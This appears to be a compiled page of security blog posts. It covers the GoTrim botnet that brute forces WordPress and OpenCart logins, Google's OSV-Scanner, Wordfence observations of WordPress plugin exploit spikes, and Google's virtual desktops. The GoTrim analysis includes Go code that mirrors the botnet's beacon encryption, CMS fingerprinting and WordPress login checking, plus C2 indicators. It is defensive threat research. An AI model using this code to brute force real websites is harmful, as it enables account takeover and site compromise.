8. MD5 Checksum: This value is generated from parts of the above request and the hardcoded AES passphrase. It serves as a message integrity checksum.

The fields are joined together with the ":::trim:::" string, hence the name chosen for this campaign. The data is then encrypted with AES-256-GCM, using the SHA-256 hash of the previously mentioned passphrase as the key.
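A minimal Go sketch of that scheme is shown below; the field values, passphrase, and nonce handling are assumptions for illustration, since the report does not cover how the nonce is framed on the wire:

    package main

    import (
        "crypto/aes"
        "crypto/cipher"
        "crypto/rand"
        "crypto/sha256"
        "fmt"
        "strings"
    )

    // encryptBeacon joins the beacon fields with the ":::trim:::" marker and encrypts
    // the result with AES-256-GCM, using the SHA-256 hash of the passphrase as the key.
    func encryptBeacon(fields []string, passphrase string) ([]byte, error) {
        key := sha256.Sum256([]byte(passphrase))
        block, err := aes.NewCipher(key[:])
        if err != nil {
            return nil, err
        }
        gcm, err := cipher.NewGCM(block)
        if err != nil {
            return nil, err
        }
        nonce := make([]byte, gcm.NonceSize())
        if _, err := rand.Read(nonce); err != nil {
            return nil, err
        }
        plaintext := []byte(strings.Join(fields, ":::trim:::"))
        // Prepend the nonce so a receiver could decrypt; GoTrim's actual framing is unknown.
        return gcm.Seal(nonce, nonce, plaintext, nil), nil
    }

    func main() {
        ciphertext, err := encryptBeacon(
            []string{"<bot ID>", "203.0.113.10", "0", "1", "192.168.1.20", "GOOD"},
            "example-passphrase")
        fmt.Printf("%x %v\n", ciphertext, err)
    }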

The server usually responds with “OK”, “404 page not found”, or “BC”, all encrypted with the same AES-GCM key. When “BC” is received, GoTrim will regenerate its bot ID and switch from server to client mode.

The first beacon request is to register a new bot (victim) to the bot network.

After each beacon request, GoTrim sleeps between a few seconds to several minutes, depending on the C2 server response and whether the malware is currently working on C2-assigned tasks before sending the next request. The malware regularly performs this beacon request to update the C2 server about the bot’s status, including successful credentials, as discussed in the brute forcing section of the article. If GoTrim fails to receive a valid response from the C2 server after 100 retries, it will terminate itself.

While the beacon requests are being sent asynchronously to update the C2 server on its status, GoTrim either sends a request to the C2 server to receive commands (client mode) or sets up an HTTP server to listen for incoming tasking requests (server mode).

Client Mode

In client mode, the malware sends a POST request to “/selects?bilert=1” to receive commands from the C2 server.

The C2 server responds with the command encrypted with the same AES-GCM key. An example of a decrypted command can be seen below in Figure 4.

Figure 4: Screenshot of the response containing the command and its options

After splitting the data by the “:::trim:::” string, seven fields can be identified, as listed below.

1. MD5 Checksum: used for checking message integrity, e.g., 83217f8b39dccc2f9f2a0157f0236c4f
2. Command ID: This indicates the command for the current task
3. Concurrency Level: This affects how many goroutines are executed for each task
4. Command Options: This contains options for the commands, separated by 7E 6A 71 6D 70 C2 A9 (~jqmp©) bytes. They are interpreted differently depending on the command:

a. Target List: This is GZIP-compressed data, which, when decompressed, contains a list of domains that will be the target for the login attempts.
b. Command Option 1 (redacted): This option contains the username for authentication commands. Instead of using the same username for each domain, the C2 server can specify a series of bytes, like C2 A9 64, to use the domain as the username.
c. Command Option 2 (redacted): For authentication commands, this option contains the password
d. Command Option 3: Unknown option for WordPress authentication
e. Command Option 4: Option for WordPress authentication to use either POST request or XML-RPC when submitting credentials.

5. Internal Values: Numeric values that are not used by the malware itself (e.g., 42 and 255) and likely represent internal tasking IDs for the current command.    

The malware supports the following commands:

  • 1: Validate provided credentials against WordPress domains
  • 2: Validate provided credentials against Joomla! domains (currently not implemented)
  • 3: Validate provided credentials against OpenCart domains
  • 4: Validate provided credentials against Data Life Engine domains (currently not implemented)
  • 10: Detect WordPress, Joomla!, OpenCart, or Data Life Engine CMS installation on the domain
  • 11: Terminate the malware

We have observed a target list containing up to 30,000 domains in a single WordPress authentication command. Additionally, we observed that authentication commands only provide a single password to test against all the domains in the list. As mentioned above, brute forcing is likely distributed by commanding a network of infected machines to test different domains and credentials.

After the malware has completed processing a command, it sleeps for a while before sending another POST request to receive a new task from the C2 server.

Server Mode

In server mode, GoTrim starts a server on a random port between 4000 and 7999 to respond to incoming POST requests sent by the threat actor. This mode gives the threat actor a more responsive way of communicating with the bot. For instance, the threat actor can check the status of the bots without waiting for the next beacon request by simply sending a POST request to a specific URL handled by the bot’s HTTP server.

To issue a command to the machine, the threat actor sends a POST request to “/BOT_ID?lert=1” with the body containing the AES-256-GCM encrypted command data, similar to the response provided by the C2 server when the client requests commands (Figure 4). Server mode supports the same commands as client mode.

The threat actor can also send a request with the parameter “/BOT_ID?intval=1” to view the status of currently running tasks and whether assigned tasks have been completed.

When CPU utilization is below a certain level (75% or 90%, depending on the number of concurrent workers used for the current task), a separate goroutine is spawned to process each domain.

Botnet Commands

Detect CMS

GoTrim attempts to identify whether one of the four CMSes (WordPress, Joomla!, OpenCart, or DataLife Engine) is being used on the target website. It does this by checking for specific strings in the webpage content.

Interestingly, it only targets self-hosted WordPress websites by checking the Referer HTTP header for “wordpress.com”. As managed WordPress hosting providers, such as wordpress.com, usually implement more security measures to monitor, detect, and block brute forcing attempts than self-hosted WordPress websites, the chance of success is not worth the risk of getting discovered.

The strings used for determining the installed CMS are listed below.

WordPress

  • “wp-content/plugins/” and “wp-content/themes/”
  • “wp-content/uploads/”
  • “wp-includes/js/”
  • “/xmlrpc.php”

Joomla!

  • "generator" content="Joomla!" and "/templates/"
  • "/media/system/js/mootools.js" and "/media/system/js/caption.js"
  • “index.php?option=com_”
  • “/modules/mod_”
  • “/components/com_”

OpenCart

  • “/index.php?route=common” and “/index.php?route=information”
  • “image/cache/catalog”
  • “catalog/view/theme/”
  • “catalog/view/javascript”

DataLife Engine

  • “DataLife Engine” and “~engine/classes/js/dle_js.js”
  • “index.php?do=search&amp;”
  • “var dle_”

While GoTrim can detect websites using the four CMSes above, it currently only supports authenticating against WordPress and OpenCart websites. This indicates that this botnet is still under development.
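As a rough illustration of this kind of marker-string detection, the hypothetical Go helper below fetches a page and checks it for the WordPress markers listed above; it sketches the technique and is not GoTrim's actual code:

    package main

    import (
        "fmt"
        "io"
        "net/http"
        "strings"
    )

    // wordPressMarkers mirrors the WordPress string groups listed above; every string
    // within a group must appear on the page for that group to count as a match.
    var wordPressMarkers = [][]string{
        {"wp-content/plugins/", "wp-content/themes/"},
        {"wp-content/uploads/"},
        {"wp-includes/js/"},
        {"/xmlrpc.php"},
    }

    // looksLikeWordPress fetches the page at url and reports whether any marker group matches.
    func looksLikeWordPress(url string) (bool, error) {
        resp, err := http.Get(url)
        if err != nil {
            return false, err
        }
        defer resp.Body.Close()
        body, err := io.ReadAll(resp.Body)
        if err != nil {
            return false, err
        }
        page := string(body)
        for _, group := range wordPressMarkers {
            matched := true
            for _, marker := range group {
                if !strings.Contains(page, marker) {
                    matched = false
                    break
                }
            }
            if matched {
                return true, nil
            }
        }
        return false, nil
    }

    func main() {
        detected, err := looksLikeWordPress("https://example.com/")
        fmt.Println(detected, err)
    }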

Validate WordPress Credentials

Aside from the username provided by the C2 server, it attempts to gather more usernames by sending a GET request to “/wp-json/wp/v2/users”.

After that, it tries to log in to the WordPress website using the list of usernames and the password provided in the C2 command by sending a POST request to “/wp-login.php”. Figure 5 shows an example of the POST request for logging in.

Figure 5: WordPress authentication request

This request causes a redirect to the admin page of the WordPress website (i.e., /wp-admin) after a successful login. To confirm that the login and redirection were successful, it checks whether the response contains id="adminmenumain".
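To illustrate the success check described above (this is a sketch of the technique, not GoTrim's implementation; the form field names are the standard WordPress login fields, and the URL and credentials are placeholders):

    package main

    import (
        "fmt"
        "io"
        "net/http"
        "net/http/cookiejar"
        "net/url"
        "strings"
    )

    // checkWordPressLogin submits one set of credentials to /wp-login.php and reports
    // whether the final response contains the admin menu marker described above.
    func checkWordPressLogin(site, user, pass string) (bool, error) {
        jar, _ := cookiejar.New(nil)
        client := &http.Client{Jar: jar} // keep cookies across the redirect to /wp-admin/
        form := url.Values{
            "log":         {user},
            "pwd":         {pass},
            "wp-submit":   {"Log In"},
            "redirect_to": {site + "/wp-admin/"},
        }
        resp, err := client.PostForm(site+"/wp-login.php", form)
        if err != nil {
            return false, err
        }
        defer resp.Body.Close()
        body, err := io.ReadAll(resp.Body)
        if err != nil {
            return false, err
        }
        return strings.Contains(string(body), `id="adminmenumain"`), nil
    }

    func main() {
        ok, err := checkWordPressLogin("https://example.com", "admin", "placeholder-password")
        fmt.Println(ok, err)
    }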

The C2 server can also specify the authentication to be performed via the WordPress XML-RPC feature, which is another way for users to programmatically interact with the CMS remotely using XML. By communicating directly with the web server’s backend, anti-bot mechanisms such as captchas that usually work when accessing the website pages could be bypassed.

After a successful login, the following information (delimited by “|”) is updated into a global status message and sent with the following request to the C2 (client mode) or in the response to incoming requests (server mode):

  • Target URL
  • Username
  • Password
  • Command ID (1 for WordPress, 3 for OpenCart, etc.)
  • Brute force status (“0GOOD” for success)

Validate OpenCart Credentials

GoTrim can also brute force websites running the open-source e-commerce platform OpenCart.

It sends a GET request to the target’s “/admin/index.php” and collects the authentication-related tokens and headers needed for the login request. It then performs the actual authentication by sending a POST request to the same URL with form-encoded data containing the username and the password.

To verify that the login request was successful, it checks if the website returned an OpenCart user token by searching for “/dashboard&user_token=” and making sure the “redirect” value from the received data is not empty.

A valid authentication response should look like the following:

{“redirect”:”https://example.com/opencart/admin/index.php?route=common/dashboard&user_token=USER_TOKEN_HASH”}

Upon successful login, the global status message is updated in the same way as for WordPress brute forcing.

Anti-bot Checks

GoTrim can detect anti-bot techniques used by web hosting providers and CDNs, such as Cloudflare and SiteGround, and evade some of their simpler checks.

It tries to mimic legitimate requests from Mozilla Firefox on 64bit Windows by using the same HTTP headers sent by the browser and supporting the same content encoding algorithms: gzip, deflate, and Brotli.

For WordPress websites, it also detects whether any of the following CAPTCHA plugins are installed:

  • Google reCAPTCHA
  • reCAPTCHA by BestWebSoft
  • WP Limit Login Attempts
  • Shield Security Captcha
  • All in One Security (AIOS) Captcha
  • JetPack Captcha
  • Captcha by BestWebSoft

The malware contains code to solve the CAPTCHA for some of these plugins. However, we still need to verify whether those bypass techniques work. We did determine that it cannot bypass the Google, WP Limit Login Attempts, and Shield Security CAPTCHAs.

In general, for the security plugins it cannot bypass, it only reports them to the C2 server by updating the global status message with information similar to the data it sends during a successful login. But it uses “3GOOD” for the brute force status to indicate that credential validation was skipped.

On encountering websites that contain the string “1gb.ru” within the page content, GoTrim also sends the same “3GOOD” brute force status. This appears to be a conscious decision to avoid targeting websites hosted by this provider, but the intent remains unclear.

Campaign Updates

While searching for other samples related to this campaign, we found a PHP script and binary from September 2022 that use different URLs, "/selects?param=1" and "/selects?walert=1", on the C2 server 89[.]208[.]107[.]12 (Figure 6). The PHP script, which we detect as PHP/GoTrim!tr.dldr, uses the same installation method, with only the download URL varying across the samples we gathered.

Figure 6: Code snippet from Sep 2022 version with different C2 servers

A version of the binary that appeared in November 2022 also updated its HTTP POST URLs (Figure 7). The beacon request URL “/selects?dram=1” and the command request URL “/selects?bilert=1” have been changed to “/route?index=1” and “/route?alert=1”, respectively. The encryption algorithm and keys used in the data transmission remain the same.

Figure 7: Wireshark capture of POST requests from two versions of GoTrim

Conclusion

Although this malware is still a work in progress, the fact that it has a fully functional WordPress brute forcer combined with its anti-bot evasion techniques makes it a threat to watch for—especially with the immense popularity of the WordPress CMS, which powers millions of websites globally.

Brute-forcing campaigns are dangerous as they may lead to server compromise and malware deployment. To mitigate this risk, website administrators should ensure that user accounts (especially administrator accounts) use strong passwords. Keeping the CMS software and associated plugins up to date also reduces the risk of malware infection by exploiting unpatched vulnerabilities.

FortiGuard Labs will continue to monitor GoTrim’s development.

Fortinet Protections

The FortiGuard Antivirus service detects and blocks this threat as ELF/GoTrim!tr and PHP/GoTrim!tr.dldr.

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR, and the Fortinet AntiVirus engine is a part of each of those solutions. Customers running current AntiVirus updates are protected.

FortiGuard Labs provides the GoTrim.Botnet IPS signature against GoTrim C2 activity.

The FortiGuard Web Filtering Service blocks the C2 servers and download URLs cited in this report.

FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

IOCs

Files

646ea89512e15fce61079d8f82302df5742e8e6e6c672a3726496281ad9bfd8a

4b6d8590a2db42eda26d017a119287698c5b0ed91dd54222893f7164e40cb508

c33e50c3be111c1401037cb42a0596a123347d5700cee8c42b2bd30cdf6b3be3

71453640ebf7cf8c640429a605ffbf56dfc91124c4a35c2ca6e5ac0223f77532

3188cbe5b60ed7c22c0ace143681b1c18f0e06658a314bdc4c7c4b8f77394729

80fba2dcc7ea2e8ded32e8f6c145cf011ceb821e57fee383c02d4c5eaf8bbe00

De85f1916d6102fcbaceb9cef988fca211a9ea74599bf5c97a92039ccf2da5f7

2a0397adb55436efa86d8569f78af0934b61f5b430fa00b49aa20a4994b73f4b

Download URLs

hxxp://77[.]73[.]133[.]99/taka

hxxp://77[.]73[.]133[.]99/trester

hxxp://77[.]73[.]133[.]99/pause

C2

hxxp://77[.]73[.]133[.]99

hxxp://77[.]73[.]133[.]99/selects?dram=1

hxxp://77[.]73[.]133[.]99/selects?bilert=1

hxxp://77[.]73[.]133[.]99/route?index=1

hxxp://77[.]73[.]133[.]99/route?alert=1

hxxp://89[.]208[.]107[.]12

hxxp://89[.]208[.]107[.]12/selects?param=1

hxxp://89[.]208[.]107[.]12/selects?walert=1

Source :
https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites

Announcing OSV-Scanner: Vulnerability Scanner for Open Source

Posted by Rex Pan, software engineer, Google Open Source Security Team

Today, we’re launching the OSV-Scanner, a free tool that gives open source developers easy access to vulnerability information relevant to their project.

Last year, we undertook an effort to improve vulnerability triage for developers and consumers of open source software. This involved publishing the Open Source Vulnerability (OSV) schema and launching the OSV.dev service, the first distributed open source vulnerability database. OSV allows all the different open source ecosystems and vulnerability databases to publish and consume information in one simple, precise, and machine readable format.

The OSV-Scanner is the next step in this effort, providing an officially supported frontend to the OSV database that connects a project’s list of dependencies with the vulnerabilities that affect them.

OSV-Scanner

Software projects are commonly built on top of a mountain of dependencies—external software libraries you incorporate into a project to add functionalities without developing them from scratch. Each dependency potentially contains existing known vulnerabilities or new vulnerabilities that could be discovered at any time. There are simply too many dependencies and versions to keep track of manually, so automation is required.

Scanners provide this automated capability by matching your code and dependencies against lists of known vulnerabilities and notifying you if patches or updates are needed. Scanners bring incredible benefits to project security, which is why the 2021 U.S. Executive Order for Cybersecurity included this type of automation as a requirement for national standards on secure software development.

The OSV-Scanner generates reliable, high-quality vulnerability information that closes the gap between a developer’s list of packages and the information in vulnerability databases. Since the OSV.dev database is open source and distributed, it has several benefits in comparison with closed source advisory databases and scanners:

  • Each advisory comes from an open and authoritative source (e.g. the RustSec Advisory Database)
  • Anyone can suggest improvements to advisories, resulting in a very high quality database
  • The OSV format unambiguously stores information about affected versions in a machine-readable format that precisely maps onto a developer’s list of packages (see the abbreviated example after this list)
  • The above all results in fewer, more actionable vulnerability notifications, which reduces the time needed to resolve them
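
To make that machine-readable format concrete, here is an abbreviated, hypothetical OSV record (the field names follow the published OSV schema, while the ID, package, and version values are made up):

{
  "id": "GHSA-xxxx-xxxx-xxxx",
  "summary": "Example advisory",
  "affected": [
    {
      "package": { "ecosystem": "PyPI", "name": "examplepkg" },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [ { "introduced": "0" }, { "fixed": "2.4.1" } ]
        }
      ]
    }
  ]
}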

Running OSV-Scanner on your project will first find all the transitive dependencies that are being used by analyzing manifests, SBOMs, and commit hashes. The scanner then connects this information with the OSV database and displays the vulnerabilities relevant to your project.
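
For instance, typical invocations point the scanner at a project directory to walk recursively or at a specific lockfile (the paths here are placeholders; see the OSV-Scanner documentation for the full set of flags):

osv-scanner -r /path/to/your/project

osv-scanner --lockfile=/path/to/package-lock.json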

OSV-Scanner is also integrated into the OpenSSF Scorecard’s Vulnerabilities check, which will extend the analysis from a project’s direct vulnerabilities to also include vulnerabilities in all its dependencies. This means that the 1.2M projects regularly evaluated by Scorecard will have a more comprehensive measure of their project security.

What else is new for OSV?

The OSV project has made lots of progress since our last post in June last year. The OSV schema has seen significant adoption from vulnerability databases such as GitHub Security Advisories and Android Security Bulletins. Altogether OSV.dev now supports 16 ecosystems, including all major language ecosystems, Linux distributions (Debian and Alpine), as well as Android, Linux Kernel, and OSS-Fuzz. This means the OSV.dev database is now the biggest open source vulnerability database of its kind, with a total of over 38,000 advisories from 15,000 advisories a year ago.

The OSV.dev website also had a complete overhaul, and now has a better UI and provides more information on each vulnerability. Prominent open source projects have also started to rely on OSV.dev, such as DependencyTrack and Flutter.

What’s next?

There’s still a lot to do! Our plan for OSV-Scanner is not just to build a simple vulnerability scanner; we want to build the best vulnerability management tool—something that will also minimize the burden of remediating known vulnerabilities. Here are some of our ideas for achieving this:

  • The first step is further integrating with developer workflows by offering standalone CI actions, allowing for easy setup and scheduling to keep track of new vulnerabilities.
  • Improve C/C++ vulnerability support: One of the toughest ecosystems for vulnerability management is C/C++, due to the lack of a canonical package manager to identify C/C++ software. OSV is filling this gap by building a high quality database of C/C++ vulnerabilities by adding precise commit level metadata to CVEs.
  • We are also looking to add unique features to OSV-Scanner, like the ability to utilize specific function level vulnerability information by doing call graph analysis, and to be able to automatically remediate vulnerabilities by suggesting minimal version bumps that provide the maximal impact.
  • VEX support: Automatically generating VEX statements using, for example, call graph analysis.

Try out OSV-Scanner today!

You can download and try out OSV-Scanner on your projects by following the instructions on our new website osv.dev. Alternatively, to automatically run OSV-Scanner on your GitHub project, try Scorecard. Please feel free to let us know what you think! You can give us feedback either by opening an issue on our GitHub, or through the OSV mailing list.

Source :
https://security.googleblog.com/2022/12/announcing-osv-scanner-vulnerability.html

Spikes in Attacks Serve as a Reminder to Update Plugins

The Wordfence Threat Intelligence team continually monitors trends in the attack data we collect. Occasionally an unusual trend will arise from this data, and we have spotted one such trend standing out over the Thanksgiving holiday in the U.S. and the first weekend in December. Attack attempts have spiked for vulnerabilities in two plugins.

The larger spikes have been from attempts to exploit an arbitrary file upload vulnerability in Kaswara Modern VC Addons <= version 3.0.1, for which a rule was added to the Wordfence firewall and made available to Wordfence Premium, Wordfence Care, and Wordfence Response users on April 21, 2021, and released to users of Wordfence Free on May 21, 2021. The other vulnerability is an arbitrary file upload and arbitrary file deletion vulnerability in the Adning Advertising plugin, versions <= 1.5.5, with our firewall rule being added on June 25, 2020 and made available to free users on July 25, 2020.

Kaswara and Adning exploit attempts per day

One thing that makes these spikes interesting is the fact that they are occurring over holidays and weekends. The first spike began on November 24, 2022, which was the Thanksgiving holiday in the United States. This spike lasted for three days. The second spike looked a little different, starting on Saturday, December 3, 2022, dropping on Sunday, and finishing with its peak on Monday. These spikes serve as an important reminder that malicious actors are aware that website administrators are not paying as close attention to their sites on holidays and weekends. This makes holidays and weekends a desirable time for attacks to be attempted.

During these spikes, exploit attempts have been observed against the Kaswara vulnerability on 1,969,494 websites, and on 1,075,458 sites against the Adning vulnerability. In contrast, the normal volume of sites with exploit attempts being blocked is an average of 256,700 for the Kaswara vulnerability, and 374,801 for the Adning vulnerability.

Kaswara and Adning sites comparison with spikes

The Kaswara Modern VC Addons plugin had more than 10,000 installations at the time the vulnerability was disclosed on April 21, 2021, and has since been closed without a patch being released. As long as this plugin is installed, it leaves the site vulnerable to attacks that allow unauthenticated attackers to upload malicious files, which could ultimately lead to a full site takeover, because the ability to upload PHP files to servers hosting WordPress makes remote code execution possible. Any WordPress website administrators who are still using the plugin should immediately remove it and replace it with a suitable alternative if the functionality is still required for the site, even if they are protected by the Wordfence firewall, as the plugin has not been maintained and may contain other issues. We estimate that about 8,000 WordPress users are still impacted by a vulnerable version, making them an easy target.

The Adning Advertising plugin had more than 8,000 users when our Threat Intelligence team performed our initial investigation of the vulnerability on June 24, 2020. After some analysis, we found two vulnerabilities in the plugin: one that would allow an unauthenticated attacker to upload arbitrary files, also leading to easy site takeover, and an unauthenticated arbitrary file deletion vulnerability that could just as easily be used for complete site compromise by deleting the wp-config.php file. After we notified the plugin’s author of the vulnerabilities, they quickly worked to release a patched version within 24 hours. Any users of the Adning Advertising plugin should immediately update to the latest version, currently 1.6.3; version 1.5.6 is the minimum version that includes the patch. We estimate that about 680 WordPress users are still impacted by a vulnerable version of this plugin.

The key takeaway from these attack attempts is to make sure your website components are kept up to date with the latest security updates. When a theme or plugin, or even WordPress core, has an update available, it should be applied as soon as it is safely possible for the website. Leaving unpatched vulnerabilities in place opens a website up to attack.

Cyber Observables

The following are the common observables we have logged in these exploit attempts. If any of these are observed on a website or in logs, it is an indication that one of these vulnerabilities has been exploited. The IP addresses listed are specifically from the spikes we have seen over the Thanksgiving holiday and the first weekend in December.

Kaswara

Top ten IPs
  • 40.87.107.73
  • 65.109.128.42
  • 65.21.155.174
  • 65.108.251.64
  • 5.75.244.31
  • 65.109.137.44
  • 65.21.247.31
  • 49.12.184.76
  • 5.75.252.228
  • 5.75.252.229
Common Uploaded Filenames

There were quite a few variations of randomly named six-letter filenames (two of which, jwoqrj.zip and nkhnhf.zip, appear below), and every uploaded filename observed used the .zip extension.

  • a57bze8931.zip
  • bala.zip
  • jwoqrj.zip
  • kity.zip
  • nkhnhf.zip
Top Ten User-Agent Strings
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 X-Middleton/1
  • Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
  • Amazon CloudFront
  • Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
  • Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
  • Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
  • Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36

Adning

Top Ten IPs
  • 65.109.128.42
  • 65.108.251.64
  • 65.21.155.174
  • 5.75.244.31
  • 65.109.137.44
  • 65.21.247.31
  • 5.75.252.229
  • 65.109.138.122
  • 40.87.107.73
  • 49.12.184.76
Common Uploaded Filenames

Most observed exploit attempts against the Adning plugin appeared to be nothing more than probing for the vulnerability, but in one instance the following filename was observed as a payload.

  • files
Top Ten User-Agent Strings
  • python-requests/2.28.1
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
  • python-requests/2.28.1 X-Middleton/1
  • python-requests/2.26.0
  • python-requests/2.27.1
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; @longcat) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
  • Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 X-Middleton/1
  • ALittle Client
Conclusion

In this post we discussed two vulnerabilities whose exploit attempts have spiked over the past two weekends. Removing or updating vulnerable plugins is always the best solution, but a Web Application Firewall like the one provided by Wordfence is important to block exploit attempts and can even protect your site from attacks targeting unknown vulnerabilities. The Wordfence firewall protects all Wordfence users, including Wordfence Free, Wordfence Premium, Wordfence Care, and Wordfence Response, against these vulnerabilities. Even with this protection in place, these vulnerabilities are serious as they can lead to full site takeover, so the Kaswara Modern VC Addons plugin should be immediately removed, and the Adning Advertising plugin should immediately be updated.

Source :
https://www.wordfence.com/blog/2022/12/spikes-in-attacks-serve-as-a-reminder-to-update-plugins/

Google’s Virtual Desktop of the Future

Nick Yeager

Manager, Google Computing

Did you know that most Google employees rely on virtual desktops to get their work done? This represents a paradigm shift in client computing at Google, and was especially critical during the pandemic and the remote work revolution. We’re excited to continue enabling our employees to be productive, anywhere! This post covers the history of virtual desktops and details the numerous benefits Google has seen from their implementation. 


Background

In 2018, Google began the development of virtual desktops in the cloud. A whitepaper was published detailing how virtual desktops were created with Google Cloud, running on Google Compute Engine, as an alternative to physical workstations. Further research had shown that it was feasible to move our physical workstation fleet to these virtual desktops in the cloud. The research began with user experience analysis – looking into how employee satisfaction of cloud workstations compared with physical desktops. Researchers found that user satisfaction of cloud desktops was higher than that of their physical desktop counterparts! This was a monumental moment for cloud-based client computing at Google, and this discovery led to additional analyses of Compute Engine to understand if it could become our preferred (virtual) workstation platform of the future.

Today, Google’s internal use of virtual desktops has increased dramatically. Employees all over the globe use a mix of virtual Linux and Windows desktops on Compute Engine to complete their work. Whether an employee is writing code, accessing production systems, troubleshooting issues, or driving productivity initiatives, virtual desktops are providing them with the compute they need to get their work done. Access to virtual desktops is simple: some employees access their virtual desktop instances via Secure Shell (SSH), while others use Chrome Remote Desktop — a graphical access tool. 

In addition to simplicity and accessibility, Google has realized a number of benefits from virtual desktops. We’ve seen an enhanced security posture, a boost to our sustainability initiatives, and a reduction in maintenance effort associated with our IT infrastructure. All these improvements were achieved while improving the user experience compared to our physical workstation fleet.


Example of Google Data Center

Analyzing Cloud vs Physical Desktops

Let’s look deeper into the analysis Google performed to compare cloud virtual desktops and physical desktops. Researchers compared cloud and physical desktops on five core pillars: user experience, performance, sustainability, security, and efficiency.


User Experience

Before the transition to virtual desktops got underway, user experience researchers wanted to know more about how they would affect employee happiness. They discovered that employees embraced the benefits that virtual desktops offered. These included freeing up valuable desk space, an always-on, always-available compute experience accessible from anywhere in the world, and reduced maintenance overhead compared to physical desktops.

Performance

From a performance perspective, cloud desktops are simply better than physical desktops. For example, running on Compute Engine makes it easy to spin up on-demand virtual instances with predictable compute and performance – a task that is significantly more difficult with a physical workstation vendor. Virtual desktops rely on a mix of Virtual Machine (VM) families that Google developed based on the performance needs of our users. These range from Google Compute Engine E2 high-efficiency instances, which employees might use for day-to-day tasks, to higher-performance N2/N2D instances, which employees might use for more demanding machine learning jobs. Compute Engine offers a VM shape for practically any computing workflow. Additionally, employees no longer have to worry about machine upgrades (to increase performance, for example) because our entire fleet of virtual desktops can be upgraded to new shapes (with more CPU and RAM) with a single config change and a simple reboot — all within a matter of minutes. Plus, Compute Engine continues to add features and new machine types, which means our capabilities only continue to grow in this space.

Sustainability

Google cares deeply about sustainability and has been carbon neutral since 2007. Moving from physical desktops to virtual desktops on Compute Engine brings us closer to Google sustainability goals of a net-neutral desktop computing fleet. Our internal facilities team has praised virtual desktops as a win for future workspace planning, because a reduction in physical workstations could also mean a reduction in first-time construction costs of new buildings, significant (up to 30%) campus energy reductions, and even further reductions in costs associated with HVAC needs and circuit size needs at our campuses. Lastly, a reduction in physical workstations also contributes to a reduction in physical e-waste and a reduction in the carbon associated with transporting workstations from their factory of origin to office locations. At Google’s scale, these changes lead to an immense win from a sustainability standpoint. 

Security

By their very nature, virtual desktops mitigate the ability for a bad actor to exfiltrate data or otherwise compromise physical desktop hardware since there is no desktop hardware to compromise in the first place. This means attacks such as USB attacks, evil maid attacks, and similar techniques for subverting security that require direct hardware access become worries of the past. Additionally, the transition to cloud-based virtual desktops also brings with it an enhanced security posture through the use of Google Cloud’s myriad security features, including Confidential Computing, vTPMs, and more.

Efficiency

In the past, it was not uncommon for employees to spend days waiting for IT to deliver new machines or fix physical workstations. Today, cloud-based desktops can be created instantaneously on-demand and resized on-demand. They are always accessible, and virtually immune from maintenance-related issues. IT no longer has to deal with concerns like warranty claims, break-fix issues, or recycling. This time savings enables IT to focus on higher priority initiatives all while reducing their workload. With an enterprise the size of Google, these efficiency wins added up quickly. 

Considerations to Keep in Mind

Although Google has seen significant benefits with virtual desktops, there are some considerations to keep in mind before deciding if they are right for your enterprise. First, it’s important to recognize that migrating to a virtual fleet requires a consistently reliable and performant client internet connection. For remote/global employees, it’s important they’re located geographically near a Google Cloud Region (to minimize latency). Additionally, there are cases where physical workstations are still considered vital. These cases include users who need USB and other direct I/O access for testing/debugging hardware and users who have ultra low-latency graphics/video editing or CAD simulation needs. Finally, to ensure interoperability between these virtual desktops and the rest of our computing fleet, we did have to perform some additional engineering tasks to integrate our asset management and other IT systems with the virtual desktops. Whether your enterprise needs such features and integration should be carefully analyzed before considering a solution such as this. However, should you ultimately conclude that cloud-based desktops are the solution for your enterprise, we’re confident you’ll realize many of the benefits we have!

Tying It All Together

